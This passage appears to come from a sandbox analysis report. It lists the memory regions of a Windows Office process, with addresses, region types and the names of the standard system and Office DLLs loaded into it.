0x141bb01cfff monitored = 0 entry_point = 0x141baf9e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 725 start_va = 0x7ffb53470000 end_va = 0x7ffb5347efff monitored = 0 entry_point = 0x7ffb53473210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 726 start_va = 0x7ffb51df0000 end_va = 0x7ffb51e85fff monitored = 0 entry_point = 0x7ffb51e15570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 727 start_va = 0x141b9740000 end_va = 0x141b974ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141b9740000" filename = "" Region: id = 743 start_va = 0x7ffb375a0000 end_va = 0x7ffb378a3fff monitored = 0 entry_point = 0x7ffb37646094 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 744 start_va = 0x141b9750000 end_va = 0x141b9751fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141b9750000" filename = "" Region: id = 745 start_va = 0x7ffb56cd0000 end_va = 0x7ffb56d90fff monitored = 0 entry_point = 0x7ffb56cf0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 746 start_va = 0x7ffb46ad0000 end_va = 0x7ffb46b60fff monitored = 0 entry_point = 0x7ffb46b22430 region_type = mapped_file name = "msvcp140.dll" filename = "\\Windows\\System32\\msvcp140.dll" (normalized: "c:\\windows\\system32\\msvcp140.dll") Region: id = 747 start_va = 0x7ffb46ac0000 end_va = 0x7ffb46acbfff monitored = 0 entry_point = 0x7ffb46ac4150 region_type = mapped_file name = "vcruntime140_1.dll" filename = "\\Windows\\System32\\vcruntime140_1.dll" (normalized: "c:\\windows\\system32\\vcruntime140_1.dll") Region: id = 748 start_va = 0x141b9760000 end_va = 0x141b976ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141b9760000" filename = "" Region: id = 749 start_va = 0x7ffb37120000 end_va = 0x7ffb37597fff monitored = 0 entry_point = 0x7ffb37199154 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 750 start_va = 0x141b9770000 end_va = 0x141b9771fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141b9770000" filename = "" Region: id = 751 start_va = 0x7ffb36830000 end_va = 0x7ffb3711afff monitored = 0 entry_point = 0x7ffb36935a48 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 752 start_va = 0x141b9780000 end_va = 0x141b9781fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141b9780000" filename = "" Region: id = 753 start_va = 0x7ffb41990000 end_va = 0x7ffb41b38fff monitored = 0 entry_point = 0x7ffb419e4060 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\gdiplus.dll") Region: id = 754 start_va = 0x7ffb36060000 end_va = 0x7ffb3682bfff monitored = 0 entry_point = 0x7ffb360f5f94 region_type = mapped_file name = "mso99lwin32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso99lwin32client.dll") Region: id = 755 start_va = 0x141b9790000 end_va = 0x141b9791fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141b9790000" filename = "" Region: id = 756 start_va = 0x7ffb3de60000 end_va = 0x7ffb3de66fff monitored = 0 entry_point = 0x7ffb3de61220 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 757 start_va = 0x7ffb51c60000 end_va = 0x7ffb51c84fff monitored = 0 entry_point = 0x7ffb51c75220 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 758 start_va = 0x7ffb51c00000 end_va = 0x7ffb51c24fff monitored = 0 entry_point = 0x7ffb51c02300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 759 start_va = 0x7ffb34d80000 end_va = 0x7ffb3605bfff monitored = 0 entry_point = 0x7ffb34d8caf0 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso.dll") Region: id = 760 start_va = 0x141b97a0000 end_va = 0x141b97a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141b97a0000" filename = "" Region: id = 761 start_va = 0x141baf40000 end_va = 0x141bb0dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141baf40000" filename = "" Region: id = 762 start_va = 0x7ffb46780000 end_va = 0x7ffb46ab9fff monitored = 0 entry_point = 0x7ffb46788520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 763 start_va = 0x141b97b0000 end_va = 0x141b97b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141b97b0000" filename = "" Region: id = 764 start_va = 0x7ffb55770000 end_va = 0x7ffb56ccefff monitored = 0 entry_point = 0x7ffb558d11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 765 start_va = 0x7ffb54200000 end_va = 0x7ffb54242fff monitored = 0 entry_point = 0x7ffb54214b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 766 start_va = 0x7ffb53520000 end_va = 0x7ffb53b63fff monitored = 0 entry_point = 0x7ffb536e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 767 start_va = 0x7ffb56df0000 end_va = 0x7ffb56e41fff monitored = 0 entry_point = 0x7ffb56dff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 768 start_va = 0x7ffb54140000 end_va = 0x7ffb541f4fff monitored = 0 entry_point = 0x7ffb541822e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 769 start_va = 0x7ffb53480000 end_va = 0x7ffb534cafff monitored = 0 entry_point = 0x7ffb534835f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 770 start_va = 0x7ffb534d0000 end_va = 0x7ffb534e3fff monitored = 0 entry_point = 0x7ffb534d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 771 start_va = 0x7ffb53300000 end_va = 0x7ffb53328fff monitored = 0 entry_point = 0x7ffb53314530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 802 start_va = 0x7ffb48250000 end_va = 0x7ffb484c3fff monitored = 0 entry_point = 0x7ffb482c0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 803 start_va = 0x141b97c0000 end_va = 0x141b97c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 804 start_va = 0x141b97d0000 end_va = 0x141b97d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141b97d0000" filename = "" Region: id = 805 start_va = 0x141bb0e0000 end_va = 0x141bb298fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 806 start_va = 0x7ffb4ff10000 end_va = 0x7ffb50454fff monitored = 0 entry_point = 0x7ffb500aa450 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 807 start_va = 0x7ffb54ae0000 end_va = 0x7ffb54c39fff monitored = 0 entry_point = 0x7ffb54b238e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 808 start_va = 0x7ffb51be0000 end_va = 0x7ffb51bf2fff monitored = 0 entry_point = 0x7ffb51be2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 809 start_va = 0x7ffb53280000 end_va = 0x7ffb532d5fff monitored = 0 entry_point = 0x7ffb53290bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 818 start_va = 0x7ffb51190000 end_va = 0x7ffb51231fff monitored = 0 entry_point = 0x7ffb511b0a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 819 start_va = 0x7ffb521f0000 end_va = 0x7ffb52219fff monitored = 0 entry_point = 0x7ffb521f8b90 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 822 start_va = 0x141bb2a0000 end_va = 0x141bb5a7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso40uires.dll") Region: id = 823 start_va = 0x141bb5b0000 end_va = 0x141bbed0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso99lres.dll") Region: id = 824 start_va = 0x7ffb146b0000 end_va = 0x7ffb146bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb146b0000" filename = "" Region: id = 825 start_va = 0x141bbee0000 end_va = 0x141c0d1efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msores.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msores.dll") Region: id = 830 start_va = 0x141b97c0000 end_va = 0x141b97cefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 831 start_va = 0x141b97e0000 end_va = 0x141b97e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141b97e0000" filename = "" Region: id = 832 start_va = 0x141baf40000 end_va = 0x141baffbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141baf40000" filename = "" Region: id = 833 start_va = 0x141bb0c0000 end_va = 0x141bb0dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141bb0c0000" filename = "" Region: id = 834 start_va = 0x141b97e0000 end_va = 0x141b97e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141b97e0000" filename = "" Region: id = 835 start_va = 0x141b97f0000 end_va = 0x141b97f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141b97f0000" filename = "" Region: id = 836 start_va = 0x141c0d20000 end_va = 0x141c0ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c0d20000" filename = "" Region: id = 837 start_va = 0x141c0ec0000 end_va = 0x141c11f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 848 start_va = 0x141c0d20000 end_va = 0x141c0e9afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 849 start_va = 0x141c0eb0000 end_va = 0x141c0ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c0eb0000" filename = "" Region: id = 850 start_va = 0x7ffb4ca60000 end_va = 0x7ffb4ccbffff monitored = 0 entry_point = 0x7ffb4cb0b5b0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 858 start_va = 0x2263900000 end_va = 0x22639fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002263900000" filename = "" Region: id = 859 start_va = 0x2263a00000 end_va = 0x2263afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002263a00000" filename = "" Region: id = 860 start_va = 0x7ffb514f0000 end_va = 0x7ffb51511fff monitored = 0 entry_point = 0x7ffb514f1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 861 start_va = 0x7ffb4b900000 end_va = 0x7ffb4b931fff monitored = 0 entry_point = 0x7ffb4b9211c0 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll") Region: id = 862 start_va = 0x7ffb4b680000 end_va = 0x7ffb4b6e1fff monitored = 0 entry_point = 0x7ffb4b681a50 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll") Region: id = 863 start_va = 0x7ffb51240000 end_va = 0x7ffb514e7fff monitored = 0 entry_point = 0x7ffb512d3250 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 869 start_va = 0x7ffb50460000 end_va = 0x7ffb506cefff monitored = 0 entry_point = 0x7ffb505122b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 870 start_va = 0x141bb000000 end_va = 0x141bb02dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141bb000000" filename = "" Region: id = 871 start_va = 0x141b9800000 end_va = 0x141b9800fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141b9800000" filename = "" Region: id = 872 start_va = 0x141bb030000 end_va = 0x141bb030fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141bb030000" filename = "" Region: id = 873 start_va = 0x141bb040000 end_va = 0x141bb040fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141bb040000" filename = "" Region: id = 874 start_va = 0x2263b00000 end_va = 0x2263bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002263b00000" filename = "" Region: id = 875 start_va = 0x2263c00000 end_va = 0x2263cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002263c00000" filename = "" Region: id = 876 start_va = 0x141bb050000 end_va = 0x141bb050fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141bb050000" filename = "" Region: id = 877 start_va = 0x141bb060000 end_va = 0x141bb060fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141bb060000" filename = "" Region: id = 878 start_va = 0x2263d00000 end_va = 0x2263dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002263d00000" filename = "" Region: id = 879 start_va = 0x7ffb4b110000 end_va = 0x7ffb4b12ffff monitored = 0 entry_point = 0x7ffb4b111920 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 880 start_va = 0x7ffb4b100000 end_va = 0x7ffb4b10bfff monitored = 0 entry_point = 0x7ffb4b101860 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 888 start_va = 0x141c1200000 end_va = 0x141c12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c1200000" filename = "" Region: id = 889 start_va = 0x141bb070000 end_va = 0x141bb070fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141bb070000" filename = "" Region: id = 890 start_va = 0x2263e00000 end_va = 0x2263efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002263e00000" filename = "" Region: id = 891 start_va = 0x141bb080000 end_va = 0x141bb084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141bb080000" filename = "" Region: id = 892 start_va = 0x141c1300000 end_va = 0x141c1afffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141c1300000" filename = "" Region: id = 899 start_va = 0x141bb090000 end_va = 0x141bb094fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ospintl.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\1033\\ospintl.dll" (normalized: "c:\\program files\\microsoft office\\office16\\1033\\ospintl.dll") Region: id = 900 start_va = 0x7ffb34b50000 end_va = 0x7ffb34d72fff monitored = 0 entry_point = 0x7ffb34b52bf0 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\riched20.dll") Region: id = 901 start_va = 0x7ffb40130000 end_va = 0x7ffb4029ffff monitored = 0 entry_point = 0x7ffb40263158 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msptls.dll") Region: id = 902 start_va = 0x141bb0a0000 end_va = 0x141bb0a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141bb0a0000" filename = "" Region: id = 903 start_va = 0x141bb0a0000 end_va = 0x141bb0a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141bb0a0000" filename = "" Region: id = 904 start_va = 0x7ffb33b90000 end_va = 0x7ffb33c39fff monitored = 0 entry_point = 0x7ffb33b993e0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_396e892957c7fb25\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_396e892957c7fb25\\comctl32.dll") Region: id = 905 start_va = 0x141c1b00000 end_va = 0x141c1c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c1b00000" filename = "" Region: id = 906 start_va = 0x7ffb51c90000 end_va = 0x7ffb51c99fff monitored = 0 entry_point = 0x7ffb51c91350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 907 start_va = 0x141bb0a0000 end_va = 0x141bb0b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 908 start_va = 0x7ffb4c0a0000 end_va = 0x7ffb4c0b7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 909 start_va = 0x141c0ea0000 end_va = 0x141c0ea0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c0ea0000" filename = "" Region: id = 911 start_va = 0x141c1c80000 end_va = 0x141c2171fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141c1c80000" filename = "" Region: id = 912 start_va = 0x141c2180000 end_va = 0x141c31bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 913 start_va = 0x141c1b00000 end_va = 0x141c1b00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141c1b00000" filename = "" Region: id = 914 start_va = 0x141c1c70000 end_va = 0x141c1c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c1c70000" filename = "" Region: id = 915 start_va = 0x7ffb55280000 end_va = 0x7ffb55326fff monitored = 0 entry_point = 0x7ffb5528b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 916 start_va = 0x2263f00000 end_va = 0x2263ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002263f00000" filename = "" Region: id = 917 start_va = 0x7ffb4c8d0000 end_va = 0x7ffb4ca54fff monitored = 0 entry_point = 0x7ffb4c916180 region_type = mapped_file name = "windows.globalization.dll" filename = "\\Windows\\System32\\Windows.Globalization.dll" (normalized: "c:\\windows\\system32\\windows.globalization.dll") Region: id = 918 start_va = 0x7ffb510d0000 end_va = 0x7ffb51136fff monitored = 0 entry_point = 0x7ffb510ee710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 919 start_va = 0x7ffb50b90000 end_va = 0x7ffb50bbffff monitored = 0 entry_point = 0x7ffb50ba9b10 region_type = mapped_file name = "globinputhost.dll" filename = "\\Windows\\System32\\globinputhost.dll" (normalized: "c:\\windows\\system32\\globinputhost.dll") Region: id = 920 start_va = 0x141c1b10000 end_va = 0x141c1b12fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 921 start_va = 0x7ffb4cf00000 end_va = 0x7ffb4cf10fff monitored = 0 entry_point = 0x7ffb4cf03e10 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 922 start_va = 0x141c1b20000 end_va = 0x141c1b20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141c1b20000" filename = "" Region: id = 923 start_va = 0x7ffb49570000 end_va = 0x7ffb495affff monitored = 0 entry_point = 0x7ffb49586c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 924 start_va = 0x141c1b30000 end_va = 0x141c1c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c1b30000" filename = "" Region: id = 925 start_va = 0x7ffb3f300000 end_va = 0x7ffb3f9fdfff monitored = 0 entry_point = 0x7ffb3f352fcc region_type = mapped_file name = "csi.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Csi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\csi.dll") Region: id = 926 start_va = 0x7ffb519f0000 end_va = 0x7ffb51b75fff monitored = 0 entry_point = 0x7ffb51a3d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 927 start_va = 0x7ffb4b640000 end_va = 0x7ffb4b67afff monitored = 0 entry_point = 0x7ffb4b641640 region_type = mapped_file name = "peerdist.dll" filename = "\\Windows\\System32\\PeerDist.dll" (normalized: "c:\\windows\\system32\\peerdist.dll") Region: id = 928 start_va = 0x141c1c30000 end_va = 0x141c1c3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141c1c30000" filename = "" Region: id = 929 start_va = 0x141c1c40000 end_va = 0x141c1c4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141c1c40000" filename = "" Region: id = 930 start_va = 0x141c31c0000 end_va = 0x141c32bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141c31c0000" filename = "" Region: id = 931 start_va = 0x2264000000 end_va = 0x22640fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002264000000" filename = "" Region: id = 932 start_va = 0x141c32c0000 end_va = 0x141c33bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141c32c0000" filename = "" Region: id = 933 start_va = 0x7ffb40820000 end_va = 0x7ffb40888fff monitored = 0 entry_point = 0x7ffb4082d3a8 region_type = mapped_file name = "aceoledb.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\aceoledb.dll") Region: id = 934 start_va = 0x7ffb3f200000 end_va = 0x7ffb3f2f0fff monitored = 0 entry_point = 0x7ffb3f220820 region_type = mapped_file name = "oledb32.dll" filename = "\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32.dll") Region: id = 935 start_va = 0x141c1c50000 end_va = 0x141c1c51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141c1c50000" filename = "" Region: id = 936 start_va = 0x7ffb4eab0000 end_va = 0x7ffb4ead4fff monitored = 0 entry_point = 0x7ffb4eab3340 region_type = mapped_file name = "msdart.dll" filename = "\\Windows\\System32\\msdart.dll" (normalized: "c:\\windows\\system32\\msdart.dll") Region: id = 937 start_va = 0x7ffb52ac0000 end_va = 0x7ffb52ac9fff monitored = 0 entry_point = 0x7ffb52ac1830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 938 start_va = 0x141c33c0000 end_va = 0x141c33d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oledb32r.dll" filename = "\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32r.dll") Region: id = 939 start_va = 0x7ffb33e00000 end_va = 0x7ffb3404afff monitored = 0 entry_point = 0x7ffb33e01ca0 region_type = mapped_file name = "acecore.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\acecore.dll") Region: id = 940 start_va = 0x141c33e0000 end_va = 0x141c73dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c33e0000" filename = "" Region: id = 941 start_va = 0x2264100000 end_va = 0x22641fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002264100000" filename = "" Region: id = 942 start_va = 0x2264200000 end_va = 0x22642fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002264200000" filename = "" Region: id = 943 start_va = 0x2264300000 end_va = 0x22643fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002264300000" filename = "" Region: id = 944 start_va = 0x7ffb33d20000 end_va = 0x7ffb33df4fff monitored = 0 entry_point = 0x7ffb33d21c0c region_type = mapped_file name = "acewstr.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\acewstr.dll") Region: id = 945 start_va = 0x141c1c60000 end_va = 0x141c1c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141c1c60000" 